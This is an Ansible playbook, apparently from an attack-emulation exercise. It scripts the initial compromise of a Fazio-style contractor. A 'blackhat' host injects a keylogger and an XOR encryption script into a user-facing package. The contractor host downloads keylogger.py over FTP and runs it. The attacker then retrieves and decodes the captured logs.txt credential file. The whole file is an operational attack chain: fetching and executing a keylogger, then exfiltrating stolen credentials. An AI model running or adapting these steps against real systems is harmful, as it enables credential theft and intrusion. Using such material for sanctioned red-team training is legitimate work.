---
#
# Stage I: Initial compromise (hijacked user-facing package inject)
#     1. Send phishing email
#     2. Download malicious software
#     3. Obtain contractor's account username and password
#

- name: package inject
  hosts: blackhat
  tasks:
    - name: hijack user-facing package
      raw: python package.py keylogger.py
    - name: upload xor encryption script
      raw: python package.py xor.py
- name: package download
  hosts: contractor
  tasks:
    - name: download the package
      raw: wget --user=anonymous --password='contractor@fazio.com' ftp://downloads.fazio.com:21/download/keylogger.py
    - name: run the keylogger
      raw: python keylogger.py
- name: recover captured credentials
  hosts: blackhat
  tasks:
    - name: download log file from ftp
      raw: wget --user=anonymous --password='contractor@fazio.com' ftp://ftp.fazio.com:21/upload/logs.txt
    - name: decode keylogger file
      raw: python decoder.py